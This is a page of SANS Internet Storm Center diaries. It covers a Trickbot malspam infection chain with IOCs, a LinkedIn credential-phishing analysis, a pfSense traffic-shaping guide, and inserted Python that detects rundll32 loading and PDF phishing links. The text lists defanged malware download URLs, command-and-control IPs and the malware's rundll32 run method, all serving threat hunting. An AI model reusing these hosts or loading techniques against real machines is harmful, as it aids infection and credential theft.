SANS Internet Storm Center - Cooperative Cyber Security Monitor
Updated: 1 hour 13 minutes
19 February 2021

ISC Stormcast For Friday, February 19th, 2021 https://isc.sans.edu/podcastdetail.html?id=7380, (Fri, Feb 19th)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
18 February 2021

ISC Stormcast For Thursday, February 18th, 2021 https://isc.sans.edu/podcastdetail.html?id=7378, (Thu, Feb 18th)

17 February 2021

Malspam pushing Trickbot gtag rob13, (Wed, Feb 17th)

Introduction

Trickbot malware has been a relatively constant presence in the cyber threat landscape so far this year.  We've seen activity continue this week, and today's diary reviews an infection I generated on Wednesday 2021-02-17.

The infection chain of events:

malicious spam (malspam) --> attachment (Excel spreadsheet) --> enable macros --> URL for Trickbot DLL --> post-infection activity

 

The email


Shown above:  Screenshot from an example of malspam seen earlier today (Wednesday 2021-02-17).

The spreadsheet


Shown above:  Screenshot of the attached Excel spreadsheet with macros for Trickbot.

Infection traffic


Shown above:  Traffic from an infection filtered in Wireshark.

Forensics on an infected Windows host


Shown above:  Initial Trickbot binary retrieved by the Excel macro.


Shown above:  Scheduled task for Trickbot.

In the above image (double-click on it to get a higher-resolution picture), you can see the Trickbot DLL is not where the scheduled task points to.  When I restarted the infected host, it gave me an error saying it couldn't run the task.  I've noticed this during the past several months from Trickbot infections that use a DLL file as the initial binary.  Unfortunately, I don't know why this happens.

Indicators of Compromise (IOCs)

EXAMPLES OF SUBJECT LINES AND REPLY-TO ADDRESSES:

  • Subject: DocuSign: Equipment # 1332
  • Subject: DocuSign: Equipment # 9448
  • Subject: DocuSign: Equipment # 9722
  • Subject: DocuSign: Equipment # 12169
  • Subject: DocuSign: Equipment # 23863
  • Reply-To: Lease Consultants <cloying@docusign.net>
  • Reply-To: Lease Consultants <dianoetic@docusign.net>
  • Reply-To: Lease Consultants <modicum@docusign.net>
  • Reply-To: Lease Consultants <omidyar@docusign.net>
  • Reply-To: Lease Consultants <rumery@docusign.net>
  • Note: Sending addresses may have been from email accounts that were compromised.

FILE HASHES FROM ATTACHMENTS SUBMITTED TO VIRUSTOTAL:

07d35c57585b6bd3a5e77be4e8c7d97725ad3646694d7b9cc61dbc058006450a  DocuSign_649568847_1582762946.xls
393bc60e292c3e24ab70c459ba1c595daaae68df94a75ebe571d3e75a0fe8109  DocuSign_484590053_1220881832.xls
64392b7c699791e4dddde1a1754d157c284dcc4d54e9cb8974ea661f6443ce86  DocuSign_463828509_1320623172.xls
713a539daad692c8e284718ad73c128128e8257b3c41b233d2f810717df873b7  DocuSign_2026401106_1090792446.xls
99316adbb0514f099d44bf8655486c2332eb5f3f821b80b2c0a6a85b652312e6  DocuSign_649568847_1582762946.xls
9bf4196e8fb7c4ac3be72f79f13697656145ee1cc93bb7c7a31d93ea75bbcae3  DocuSign_1264755469_604175183.xls
9fbbb8b4025b2e46429594b946d2ba74ce381e4c2968966e9a65ffd81791baa1  DocuSign_1283716068_336411873.xls
bc033032b6d2afcea2a07f4b5eb5de3137c9fc83c1302fe28a781137168884eb  DocuSign_1993467225_1309843348.xls
bc47683422d0021b2b27b551d81058213fa4d000c544b617adf1bb7b94d5f4a9  DocuSign_558551337_1625623689.xls
f391892523950617f98dd08c5e1e8ffa58f8985f7527d5ffe735944db72a312f  DocuSign_1237489607_947076939.xls

 

MALWARE FROM AN INFECTED WINDOWS HOST:

SHA256 hash: bc033032b6d2afcea2a07f4b5eb5de3137c9fc83c1302fe28a781137168884eb

  • File size: 168,960 bytes
  • File name: DocuSign_1993467225_1309843348.xls
  • File description: Excel spreadsheet with macros for Trickbot gtag rob13

SHA256 hash: e1b67bd8b15bcd422fcbc74fa3b691c40c527ffedc951a6bb8e67ca257240d16

  • File size: 698,880 bytes
  • File location: hxxps://destinostumundo[.]com/layout/recruter.php
  • File location: C:\Users\[username]\HGrt.foste
  • File description: Initial Trickbot gtag rob13 binary (DLL file)
  • Run method: rundll32.exe [file name],DllRegisterServer1
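The run method listed above (rundll32 loading a payload with a non-.dll extension out of the user profile through an exported function) is the kind of process-creation event a defender can triage automatically. The Python below is an added example, not Brad's code and not part of the diary: it parses rundll32 command lines and applies a few hypothetical heuristics over constructed sample lines. The user names, every path other than the one listed above, and the heuristics themselves are assumptions.

```python
import re
from pathlib import PureWindowsPath

# Constructed process-creation command lines (not from the diary's pcap or host).
# The first mirrors the run method listed above: a payload with a non-.dll extension
# in the user profile, loaded through an exported function. User names are made up.
SAMPLE_COMMAND_LINES = [
    r"rundll32.exe C:\Users\alice\HGrt.foste,DllRegisterServer1",
    r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL",
    r'"C:\Windows\System32\rundll32.exe" "C:\Users\bob\AppData\Local\Temp\update.dll",#1',
    r"notepad.exe C:\Users\alice\notes.txt",
]

# rundll32 image (optionally quoted / with a full path), then "<module>,<export>"
RUNDLL32_RE = re.compile(
    r'^\s*"?(?:[A-Za-z]:\\[^"]*\\)?rundll32(?:\.exe)?"?\s+'
    r'"?(?P<module>[^",]+?)"?\s*,\s*(?P<export>\S+)',
    re.IGNORECASE,
)


def parse_rundll32(cmdline):
    """Return (module path, export) for a rundll32 command line, else None."""
    m = RUNDLL32_RE.match(cmdline)
    return (m["module"], m["export"]) if m else None


def suspicious_reasons(cmdline):
    """Hypothetical triage heuristics; returns the reasons the line was flagged."""
    parsed = parse_rundll32(cmdline)
    if parsed is None:
        return []
    module, export = parsed
    path = PureWindowsPath(module)           # works on any OS, no filesystem access
    parts = [p.lower() for p in path.parts]
    reasons = []
    if path.suffix.lower() != ".dll":
        reasons.append(f"module extension is '{path.suffix}', not .dll")
    if "users" in parts:
        reasons.append("module loaded from a user profile directory")
    if export.lower().startswith("dllregisterserver"):
        reasons.append(f"registration-style export '{export}'")
    if export.startswith("#"):
        reasons.append(f"export called by ordinal {export}")
    return reasons


def triage(cmdlines):
    """Map each flagged command line to its reasons; clean lines are omitted."""
    flagged = {}
    for cmdline in cmdlines:
        reasons = suspicious_reasons(cmdline)
        if reasons:
            flagged[cmdline] = reasons
    return flagged


if __name__ == "__main__":
    for cmdline, reasons in triage(SAMPLE_COMMAND_LINES).items():
        print(cmdline)
        for reason in reasons:
            print("   -", reason)
```

The shell32 line is left unflagged on purpose: rundll32 itself is legitimate and common, so the value is in the combination of where the module lives, what it is called and which export is invoked, not in the image name alone.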

SHA256 hash: 24bd33f4ba457d77d796620a2cd4b7a3e38d63e2286fec752d898ab7c5204e4b

  • File size: 864,256 bytes
  • File location: hxxp://195.123.208[.]170/images/control.png
  • File description: Follow-up Trickbot EXE file, gtag tot43

SHA256 hash: f0391039f888fb30566295365420868ac8539075e25a690ac4400a8bb91eb803

  • File size: 864,256 bytes
  • File location: hxxp://195.123.208[.]170/images/scroll.png
  • File description: Follow-up Trickbot EXE file, gtag lib43

TRAFFIC TO RETRIEVE THE INITIAL TRICKBOT BINARY (A DLL FILE):

  • 98.142.109[.]186 port 80 - destinostumundo[.]com - GET /layout/recruter.php
  • 98.142.109[.]186 port 443 (HTTPS) - destinostumundo[.]com - GET /layout/recruter.php

POST-INFECTION TRAFFIC FOR TRICKBOT:

  • 108.170.20[.]72 port 443 - HTTPS traffic
  • 179.191.108[.]58 port 449 - HTTPS traffic
  • port 80 - checkip.amazonaws.com - GET /
  • 177.87.0[.]7 port 447 - HTTPS traffic
  • 103.102.220[.]50 port 443 - 103.102.220[.]50:443 - POST /rob13/[string with host and infection info]/81/
  • 36.95.27[.]243 port 443 - 36.95.27[.]243:443 - POST /rob13/[string with host and infection info]/81/
  • 103.102.220[.]50 port 443 - 103.102.220[.]50:443 - POST /rob13/[string with host and infection info]/83/
  • 36.95.27[.]243 port 443 - 36.95.27[.]243:443 - POST /rob13/[string with host and infection info]/90

TRAFFIC CAUSED BY TRICKBOT'S PROPAGATION MODULES TO RETRIEVE ADDITIONAL TRICKBOT BINARIES (RETURNED EXE FILES):

  • 195.123.208[.]170 port 80 - 195.123.208[.]170 - GET /images/control.png
  • 195.123.208[.]170 port 80 - 195.123.208[.]170 - GET /images/scroll.png

ATTEMPTED TCP CONNECTIONS CAUSED BY THE INFECTED WINDOWS HOST:

  • 45.14.226[.]115 port 443
  • 169.239.45[.]42 port 449
  • 92.242.214[.]203 port 449
  • 94.158.245[.]54 port 443
  • 38.132.99[.]174 port 80

Final words

A pcap of the infection traffic and the associated malware can be found here.

---
Brad Duncan
brad [at] malware-traffic-analysis.net

17 February 2021

The new "LinkedInSecureMessage"?, (Wed, Feb 17th)

[This is a guest diary by JB Bowers - @cherokeejb_]

With all the talk of secure messenger applications lately, I bet you’d like to have just one more, right?  In the past few weeks, we’ve noticed a new variant on a typical cred-stealer, in this case offering itself up as a new, secure messaging format used over the career website LinkedIn.   

There’s only one problem with this… there is no such thing as a “LinkedIn Private Shared Document”.

Not Quite Secure

Victims will receive an ordinary message, likely from someone they are already connected with.  These are not from the more recent, unsolicited “InMail” feature, but a regular, internal “Message” on LinkedIn. There is nothing interesting about the message, although it contains a 3rd-party link, claiming to be a “LinkedInSecureMessage”, which serves up the nice-looking pdf file shown above.

If you click “VIEW DOCUMENT,” it opens up a convincing LinkedIn login page.  The example below was originally hosted at dev-jeniferng153(.)pantheonsite(.)io [1]:

This page comes complete with links directing you back to the real LinkedIn.com site, as well as a cookie called “test,” which is backdated to 1969.

A bit deeper

I wanted to look at a selection of these domains, so I used Urlquery to find similar domains and also used VirusTotal to search for similar 2nd-stage documents.  A common theme here is the use of websites that may also have legitimate work purposes, for example appspot, firebase, and pantheonsite.  The sites use major ASNs including Fastly, Google, and Microsoft, which also makes basic network traffic analysis not very useful for the end user.

Here are a few example domains:

  • dev-jeniferng153.pantheonsite(.)io
  • fluted-house-283121.uc.r.appspot(.)com
  • dev-cloudvpds100.pantheonsite(.)io
  • earnest-sandbox-295108.ey.r.appspot(.)com

After reviewing dozens of these domains, it is clear that blocking individual domains, or even some type of regular expression based on known URLs, is not going to get very far.  If you’re not able to block these sites or their corresponding IP addresses altogether, preventing attacks like this means focusing on the human element and, of course, enforcing good security practices, like avoiding password reuse across websites.

I found several similar samples on VirusTotal, for example sha1 f5884fd520f302654ab0a165a74b9645a31f4379 - Japanbankdocument (1).pdf [2].   All the files I examined used a variety of other generic or known company names, followed by the word “document,” and they had similar metadata in the pdf files. This file is currently flagged as malicious by only 1/62 vendors reporting to VirusTotal (Microsoft alone flags it as a malicious phishing document).

A second document sampled, of which only the very last part of the file name, “document.pdf”, is known, currently scores 0 on VT. I used Didier’s PDF analysis tools pdfid and pdf-parser [3] to look at samples of the documents; below are the highlights:

PDFiD 0.2.7
 PDF Header: %PDF-1.7
 obj                   50
 endobj                50
 stream                 6
 endstream              6
 ...
 xref                   1
 trailer                1
 startxref              1
 /Page                  1
 ...
 /XFA                   0
 /URI                   2    ← Here we can see there is a URI present.
 /Colors > 2^24         0

obj 50 0                     ← Using pdf-parser we find the next-stage phishing link in pdf object 50
 Type:
 Referencing:
   <<
     /Flags 0
     /S /URI
     /URI (hxxps://dev-jeniferng153.pantheonsite(.)io/document(.)zip)
   >>
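The pdfid/pdf-parser walk-through above boils down to one question for a lure document: which external links does it carry, and where do they point? The following Python is an added example, not the guest author's code and not Didier's tools: it locates /S /URI action objects in a PDF, decodes the /URI value whether it is a literal string (including escaped parentheses) or a hex string, and lists the hostnames, so that the link target can be compared against what you would expect from the sender. The embedded PDF and its hosts (`phish.example.invalid`, `example.com`) are constructed for the example, not taken from the campaign.

```python
import re
from urllib.parse import urlsplit

# Constructed minimal PDF (not the diary's sample): a /Link annotation whose /A action
# is a /URI action object, the same structure pdf-parser showed in object 50 above.
# Object 51 carries its URI as a hex string to exercise that code path too.
SAMPLE_PDF = b"""%PDF-1.7
1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] /Annots [4 0 R] >> endobj
4 0 obj << /Type /Annot /Subtype /Link /Rect [72 700 300 720] /A 50 0 R >> endobj
50 0 obj << /Flags 0 /S /URI /URI (https://phish.example.invalid/document\\(1\\).zip) >> endobj
51 0 obj << /S /URI /URI <68747470733A2F2F6578616D706C652E636F6D2F> >> endobj
trailer << /Root 1 0 R >>
%%EOF
"""

OBJ_RE = re.compile(rb"(\d+)\s+(\d+)\s+obj\b(.*?)\bendobj", re.DOTALL)
URI_ACTION_RE = re.compile(rb"/S\s*/URI\b")
URI_KEY_RE = re.compile(rb"/URI\s*(?=[(<])")   # the /URI key whose value follows
ESCAPES = {b"n": b"\n", b"r": b"\r", b"t": b"\t", b"b": b"\b", b"f": b"\f",
           b"(": b"(", b")": b")", b"\\": b"\\"}


def decode_literal(data, start):
    """Decode the PDF literal string whose '(' is at data[start]; returns (text, end)."""
    depth, i, out = 0, start, bytearray()
    while i < len(data):
        c = data[i:i + 1]
        if c == b"\\":                      # backslash escapes, incl. \( \) and octal
            nxt = data[i + 1:i + 2]
            if nxt in ESCAPES:
                out += ESCAPES[nxt]
                i += 2
                continue
            octal = re.match(rb"[0-7]{1,3}", data[i + 1:i + 4])
            if octal:
                out.append(int(octal.group(), 8) & 0xFF)
                i += 1 + len(octal.group())
                continue
            i += 2                          # unknown escape: drop the backslash
            continue
        if c == b"(":
            depth += 1
            if depth > 1:                   # balanced inner parens are literal
                out += c
        elif c == b")":
            depth -= 1
            if depth == 0:
                return out.decode("latin-1"), i + 1
            out += c
        else:
            out += c
        i += 1
    raise ValueError("unterminated literal string")


def decode_hex(data, start):
    """Decode the PDF hex string whose '<' is at data[start]; returns (text, end)."""
    end = data.index(b">", start)
    digits = re.sub(rb"\s+", b"", data[start + 1:end])
    if len(digits) % 2:                     # a trailing odd digit is padded with 0
        digits += b"0"
    return bytes.fromhex(digits.decode("ascii")).decode("latin-1"), end + 1


def extract_uris(pdf_bytes):
    """Return [(object number, uri)] for every object that is a /S /URI action."""
    found = []
    for m in OBJ_RE.finditer(pdf_bytes):
        objnum, body = int(m.group(1)), m.group(3)
        if not URI_ACTION_RE.search(body):
            continue
        for key in URI_KEY_RE.finditer(body):
            pos = key.end()
            if body[pos:pos + 1] == b"(":
                uri, _ = decode_literal(body, pos)
            else:
                uri, _ = decode_hex(body, pos)
            found.append((objnum, uri))
    return found


def external_link_hosts(pdf_bytes):
    """Hostnames a reader would be sent to; compare against hosts expected for the sender."""
    hosts = {urlsplit(u).hostname for _, u in extract_uris(pdf_bytes)
             if urlsplit(u).scheme in ("http", "https")}
    return sorted(h for h in hosts if h)


if __name__ == "__main__":
    for objnum, uri in extract_uris(SAMPLE_PDF):
        print(f"object {objnum}: {uri}")
    print("hosts:", external_link_hosts(SAMPLE_PDF))
```

This scans uncompressed objects only; a document that hides its action dictionaries inside object streams needs the streams inflated first, which is exactly the step pdf-parser performs for you.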

The real danger here is when the campaign targets high-value targets, using their accounts to target more and more of their LinkedIn contacts, or pivots into stealing credentials which would create more access for the adversary, for example a Microsoft O365 credential-stealer, like the one shown in a similar O365 phish [4].

Again, the main advantage for the attackers is that by compromising accounts they gain a way to reach out convincingly to colleagues, friends, and family of the victims.  This provides yet another way an adversary can make the most out of a hacked web server, by hosting countless domains like these for phishing.

The Human Element

If you see any more LinkedIn messages like this, you’ll of course want to let that person know out of band that their account has been compromised and that they should update their LinkedIn password, as well as report the abuse to LinkedIn. They’ll need to let all their LinkedIn contacts know their account has been used by someone else.  If they have unfortunately used their LinkedIn password on any other sites, those passwords should be changed as well.

While not very complicated in terms of the malware or tactics used, this is certainly the type of campaign you’ll want to watch out for, and train your colleagues to watch out for, specifically. Since the message is also based on LinkedIn, you may of course want to block, or forbid by policy, the use of social media at work altogether.  This choice may not be a good culture fit with many organizations these days, although campaigns like this provide a good reason to consider encouraging employees not to use social media or other personal websites on their work computers.

There are some other general tips for avoiding similar phishing emails on LinkedIn’s page for Identifying Phishing, and also on their page for Recognizing and Reporting Scams [5,6].

JB Bowers
@cherokeejb_

References:
[1] https://urlscan.io/result/fc3ce0f8-f327-44d0-841a-a216d5f782db/
[2] https://www.virustotal.com/gui/file/4f09b9b73008dd1e7c074f5c1b9687ce41aea29006300f4617c1a894bd8864e6/detection
[3] https://blog.didierstevens.com/programs/pdf-tools/
[4] https://www.linkedin.com/pulse/case-phishy-inmail-vasyl-gello/
[5] https://safety.linkedin.com/identifying-abuse#Browsing
[6] https://www.linkedin.com/help/linkedin/answer/56325

17 February 2021

ISC Stormcast For Wednesday, February 17th, 2021 https://isc.sans.edu/podcastdetail.html?id=7376, (Wed, Feb 17th)

16 February 2021

More weirdness on TCP port 26, (Tue, Feb 16th)

A little over a year ago, I wrote a diary asking what was going on with traffic on TCP port 26. So, last week when I noticed another spike on port 26, I decided to take another look.

This time around, again based on looking at my honeypot traffic, it looks like a possible new variant of Satori. I'm still not sure why they are expecting to find telnet on port 26, but this is what I'm seeing in the honeypot.

It looks like it might be slowing down a little since the initial spike in the middle of last week, but this is still more traffic than we've seen on port 26 since the big increase I wrote about last time. If anyone has any more insight into this one, please let us know via our contact page, e-mail, or comment below.

---------------
Jim Clausing, GIAC GSE #26
jclausing --at-- isc [dot] sans (dot) edu

16 February 2021

ISC Stormcast For Tuesday, February 16th, 2021 https://isc.sans.edu/podcastdetail.html?id=7374, (Tue, Feb 16th)

15 February 2021

Securing and Optimizing Networks: Using pfSense Traffic Shaper Limiters to Combat Bufferbloat, (Mon, Feb 15th)

[This is a guest diary by Yee Ching Tok (personal website here (https://poppopretn.com)). Feedback welcome either via comments or our contact page (https://isc.sans.edu/contact.html)]

In light of recent challenges brought about by COVID-19, the need for remote work, meetings, training, and learning has increased exponentially. A secure and optimized network would certainly allow users to do their best, despite being unable to work from their usual offices. I was recently asked if the addition of an open-source firewall, such as pfSense, would introduce network latency, reduce network speeds and affect productivity. A concern brought up was the issue of Bufferbloat, briefly defined as high latency within the network when multiple types of network traffic [for example bulk traffic (think upload/download)] hinder time-sensitive traffic (think gaming, Zoom/Skype, etc.) [1]. This phenomenon is usually caused by a router lacking the ability to execute Smart Queue Management (SQM) for the network traffic. After some experiments and research, I would like to share that using pfSense’s Traffic Shaper Limiters could help optimize networks and address potential Bufferbloat issues. I also discuss some settings that were tweaked and tested (vis-à-vis what is usually outlined) to ensure conformance to cybersecurity best practices while network performance is optimized.

Note: All networks are unique, and multiple factors can affect network performance. Processing power and availability of memory do affect the capability of a pfSense firewall, so please make sure to buy/build an appropriately sized firewall that matches the network bandwidth requirements. There are also alternative solutions that address Bufferbloat issues, such as using Ubiquiti products [2] or Untangle NG Firewall [3]. Last but not least, please remember to do a config backup on your pfSense firewall before changing anything, and test the changes made in a test network before deploying them into the production environment.

1) Assess network condition

Firstly, assess your network connection with your ISP. The website DSLReports (https://www.dslreports.com/speedtest) is suitable to start with. Start the test by selecting the appropriate connection type (E.g. Gigabit/Fiber, Cable, DSL, etc). Note down the final result, especially the grade for Bufferbloat.

2) Set up Download Limiter

Next, log in to the pfSense Web GUI, and navigate to the Limiters section. (Click on “Firewall” > “Traffic Shaper”). Following that, click on “Limiters”, and select the “New Limiter” button on the left side of the menu (Please refer to Figure 1 for the areas to select). 



Figure 1: Creating a New Limiter (Download Limiter) 

Input the following configurations (Please refer to Figure 2 for a screenshot of the configuration) for the new Limiter:

Enable – Enable limiter and its children (Check this box)
Name – WANDownload (Feel free to name it otherwise, no spaces allowed)
Bandwidth – Input the bandwidth for download as subscribed from your ISP, and select the unit (Bit/s, Kbit/s, Mbit/s). Leave the “Schedule” field unmodified. (In Figure 2, I used 1000 Mbit/s. Please adjust the values here according to your ISP subscription, or at least the guaranteed speed you are aware that the ISP is giving you.)
Mask – None 
Description – WAN Download Speed (Feel free to name it otherwise, spaces allowed)
Queue Management Algorithm – CoDel
Scheduler – FQ_CODEL (Note: You can set the value of the “quantum” parameter to 300 if you want to give priority to Voice over IP (VoIP) traffic. In addition, if your pfSense firewall is not constrained by memory, you can change the value of the “limit” parameter to 20480, and the value of “flows” parameter to 65535. Figure 2 does not show this yet, but you will be able to see these fine-grained settings after you save the limiter.)
Queue Length – 1000 (for a connection with higher bandwidth, this value can be increased to 2000/5000/10000. Start off with 1000 first.)
ECN – Enable Explicit Congestion Notification (Check this box)

At the bottom of the page, click “Save”. Do not navigate away from the page just yet. 



Figure 2: Configuration of Download Limiter

Note: You will get the following message “The traffic shaper configuration has been changed. The changes must be applied for them to take effect.”. This message can be ignored, as the changes can be applied later in one go once the download and upload limiters and queues are configured.

3) Set up Download Limiter Queue

After clicking the “Save” button, click on the “Add new Queue” button next to it (Please refer to Figure 3 for the illustration). Note: pfSense may not direct you to the Queue configuration page even after you select the “Add new Queue” button. You will notice this if you see the input for bandwidth (this is not needed for Queue configuration). In this case, select the limiter you have just created, e.g. “WANDownload”, on the left side of the menu. Scroll down, and click on the “Add new Queue” button again. You will then be redirected to the Queue configuration page.



Figure 3: Selecting the “Add new Queue” Button after Configuring Download Limiter


Input the following configurations (Please refer to Figure 4 for a screenshot of the configuration):

Enable – Enable this queue (Check this box)
Name – WANDownloadQueue (Feel free to name it otherwise, spaces not allowed)
Mask – None 
Description – WAN Download Queue (Feel free to name it otherwise, spaces allowed)
Queue Management Algorithm – CoDel
Queue Length –  (Leave this blank)
ECN – Enable Explicit Congestion Notification (Check this box)

At the bottom of the page, click “Save”. 



Figure 4: Configuring Download Limiter Queue

4) Set up Upload Limiter

It is now time to set up the Upload Limiter. Select “New Limiter” on the left side of the menu (Please refer to Figure 5 for how things should look now). 



Figure 5: Creating a New Limiter (Upload Limiter)

Input the following configurations (Please refer to Figure 6 for a screenshot of the configuration):

Enable – Enable limiter and its children (Check this box)
Name – WANUpload (Feel free to name it otherwise, no spaces allowed)
Bandwidth – Input the bandwidth for upload as subscribed from your ISP, and select the unit (Bit/s, Kbit/s, Mbit/s). Leave the “Schedule” field unmodified. (In Figure 6, I used 500 Mbit/s. Please adjust the values here according to your ISP subscription, or at least the guaranteed speed you are aware that the ISP is giving you.)
Mask – None 
Description – WAN Upload Speed (Feel free to name it otherwise, spaces allowed)
Queue Management Algorithm – CoDel
Scheduler – FQ_CODEL (Note: You can set the value of the “quantum” parameter to 300 if you want to give priority to Voice over IP (VoIP) traffic. In addition, if your pfSense firewall is not constrained by memory, you can change the value of the “limit” parameter to 20480, and the value of “flows” parameter to 65535. Further explanations available here [4].)
Queue Length – 1000 (for a connection with higher bandwidth, this value can be increased to 2000/5000/10000. Start off with 1000 first.)
ECN – Enable Explicit Congestion Notification (Check this box)

At the bottom of the page, click “Save”. Do not navigate away from the page just yet.



Figure 6: Configuration of Upload Limiter

5) Set up Upload Limiter Queue

After clicking the “Save” button, click on the “Add new Queue” button next to it (Please refer to Figure 3 for the illustration). Note: pfSense may not direct you to the Queue configuration page even after you select the “Add new Queue” button. You will notice this if you see the input for bandwidth (this is not needed for Queue configuration). In this case, select the limiter you have just created, e.g. “WANUpload”, on the left side of the menu. Scroll down, and click on the “Add new Queue” button again. You will then be redirected to the Queue configuration page.

Input the following configurations (Please refer to Figure 7 for a screenshot of the configuration):

Enable – Enable this queue (Check this box)
Name – WANUploadQueue (Feel free to name it otherwise, spaces not allowed)
Mask – None 
Description – WAN Upload Queue (Feel free to name it otherwise, spaces allowed)
Queue Management Algorithm – CoDel
Queue Length –  (Leave this blank)
ECN – Enable Explicit Congestion Notification (Check this box)

At the bottom of the page, click “Save”.



Figure 7: Configuring Upload Limiter Queue

It is now time to apply the changes made. Click on the “Apply Changes” button on the top of the page (Please refer to Figure 8). After applying the changes, you will see a message stating “The changes have been applied successfully.”.



Figure 8: Applying Changes Made to Traffic Shaping Limiters and Queues

6) Set up Floating Firewall Rules

Navigate to the pfSense Firewall Rules page (Click on “Firewall” > “Rules”). Following that, click on “Floating” (by default, you will be brought to the “WAN” rules page). Select the first “Add” button (With reference to Figure 9, the button highlighted by the red box and with the arrow pointing up).



Figure 9: Navigating to pfSense Floating Rules and Adding First Rule

Floating Rule #1 (Please refer to Figure 10 for a screenshot of the configuration):
•    Action: Pass
•    Quick: Tick Apply the action immediately on match.
•    Interface: WAN
•    Direction: out
•    Address Family: IPv4
•    Protocol: ICMP
•    ICMP subtypes: Traceroute
•    Source: any
•    Destination: any
•    Description: Traceroute routing workaround
•    Advanced Options: Click on “Display Advanced”.
Scroll down.
•    Gateway: Do not use Default. Select your firewall WAN gateway.

Click “Save”. You will see a message “The firewall rule configuration has been changed. The changes must be applied for them to take effect.” on the top of the GUI (with reference to Figure 11). This message can be ignored, as the changes can be applied later in one go once all the firewall rules have been configured.



Figure 10: Configuration of Floating Rule for Traceroute Routing Workaround 

This rule is required for users who experience their pfSense firewall not being able to send out ICMP traceroute [5] when Traffic Shaper Limiters are used. I personally did not experience this when I tested my configuration, and thus disabled this Floating Rule.

Select the second “Add” button (With reference to Figure 11, the button highlighted by the red box and with the arrow pointing down).



Figure 11: Addition of Second Floating Rule

Floating Rule #2 (Please refer to Figure 12 for a screenshot of the configuration):
•    Action: Pass
•    Quick: Tick Apply the action immediately on match.
•    Interface: WAN
•    Direction: out
•    Address Family: IPv4
•    Protocol: ICMP
•    ICMP subtypes: Echo reply, Echo Request
•    Source: any
•    Destination: any
•    Description: Limiter drop ping traffic under load workaround (Bug #9024) 
•    Advanced Options: Click on “Display Advanced”.
Scroll down.
•    Gateway: Do not use Default. Select your firewall WAN gateway.

Click “Save”. 



Figure 12: Configuration of Floating Rule for Limiter dropping Ping Traffic Under Load

This rule is required for users who experience their pfSense firewall dropping ping traffic when it is under heavy load while Traffic Shaper Limiters are used [6]. I personally did not experience this when I tested my configuration, and thus disabled this Floating Rule. In addition, take particular note of the “Direction” option. While it is tempting to put “any” instead of “out”, “any” will allow the pfSense firewall to respond to incoming ping requests (something many users may not want their firewalls to do).

Next, we have to create the floating rules that will optimize the network traffic. There are some who suggest the usage of a single “Pass” action floating rule, and with the “Direction” option configured to “out”. This is not recommended. Firstly, according to Netgate documentation, Traffic Shaping related rules should utilize the “Match” action [7]. Secondly, by using only “out” for the “Direction” option, only outgoing traffic will be optimized and incoming traffic ignored. As such, 2 floating rules (one for incoming, and one for outgoing) should be created. They are as follows:

Select the second “Add” button (With reference to Figure 11, the button highlighted by the red box and with the arrow pointing down) again.

Floating Rule #3 (Incoming Traffic) (Please refer to Figure 13 for a screenshot of the configuration):
•    Action: Match
•    Interface: WAN
•    Direction: in
•    Address Family: IPv4 (Select IPv4+IPv6 if the network has IPv6 traffic)
•    Protocol: Any
•    Source: any
•    Destination: any
•    Description: WAN Incoming Traffic Queue 
•    Advanced Options: Click on “Display Advanced”.
Scroll down.
•    Gateway: Do not use Default. Select your firewall WAN gateway.
•    In / Out pipe: WANUploadQueue / WANDownloadQueue

Click “Save”. 



Figure 13: Configuration of Floating Rule for Incoming Traffic

Select the second “Add” button (With reference to Figure 11, the button highlighted by the red box and with the arrow pointing down) for the last time.

Floating Rule #4 (Outgoing Traffic) (Please refer to Figure 14 for a screenshot of the configuration):
•    Action: Match
•    Interface: WAN
•    Direction: out
•    Address Family: IPv4 (Select IPv4+IPv6 if the network has IPv6 traffic)
•    Protocol: Any
•    Source: any
•    Destination: any
•    Description: WAN Outgoing Traffic Queue 
•    Advanced Options: Click on “Display Advanced”.
Scroll down.
•    Gateway: Do not use Default. Select your firewall WAN gateway.
•    In / Out pipe: WANDownloadQueue / WANUploadQueue

Click “Save”. 



Figure 14: Configuration of Floating Rule for Outgoing Traffic

Finally, you can go ahead to click the “Apply Changes” button at the top of the GUI to apply the created firewall rules (Please refer to Figure 15). After applying the changes, you will see a message “The changes have been applied successfully. The firewall rules are now reloading in the background. Monitor the filter reload progress.”. 



Figure 15: Applying Firewall Rules

7) Re-assess network condition

Finally, re-assess your network connection with your ISP at the DSLReports website. (https://www.dslreports.com/speedtest). Start the test by selecting the appropriate connection type (E.g. Gigabit/Fiber, Cable, DSL etc), and the grade for Bufferbloat should have improved with the implementation of Traffic Shaping Limiters and Queues. 

That is all! I hope this guide has been useful in introducing network enhancements while maintaining the security of networks, especially for pfSense users. Do note that implementing Traffic Shaping may require a bit of further tweaking (e.g. Download and Upload Limiters, especially the parameter values under the Scheduler option highlighted in Steps 2 and 4 previously) due to various factors (e.g. ISP, geolocation, business requirements, equipment, etc). However, the steps outlined above should be enough to get you started on optimizing networks (especially home networks) that are increasingly being used for work, studies and personal entertainment. 

[1] https://www.bufferbloat.net/
[2] https://help.ubnt.com/hc/en-us/articles/220716608-EdgeRouter-Advanced-queue-CLI-examples
[3] https://wiki.untangle.com/index.php/Bufferbloat 
[4] https://forum.netgate.com/post/807490 
[5] https://docs.netgate.com/pfsense/en/latest/troubleshooting/traceroute-output.html
[6] https://redmine.pfsense.org/issues/9024
[7] https://docs.netgate.com/pfsense/en/latest/firewall/floating-rules.html

15 February 2021

ISC Stormcast For Monday, February 15th, 2021 https://isc.sans.edu/podcastdetail.html?id=7372, (Mon, Feb 15th)

14 February 2021

Video: tshark & Malware Analysis, (Sun, Feb 14th)

In this video, I show the commands I used in diary entry "Quickie: tshark & Malware Analysis" to analyze shellcode from a pcapng file, and I also show some basic options and features of tshark, the command-line version of Wireshark.

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com

13 February 2021

Using Logstash to Parse IPtables Firewall Logs, (Sat, Feb 13th)

One of our readers submitted some DSL modem firewall logs (iptables format), and I wrote a simple Logstash[1] parser to analyze and illustrate the activity; in this case it is all scanning activity against this modem. An iptables parser exists for Filebeat[2], but for this example I wanted to show how to create a simple Logstash parser using Grok[3] to parse these logs and send them to Elastic.

The Logstash Configuration Parser

# Guy Bruneau, guybruneau@outlook.com
# Date: 13 Feb 2021
# Version: 0.1
#
# Parse to Elastic Common Schema (ECS) format
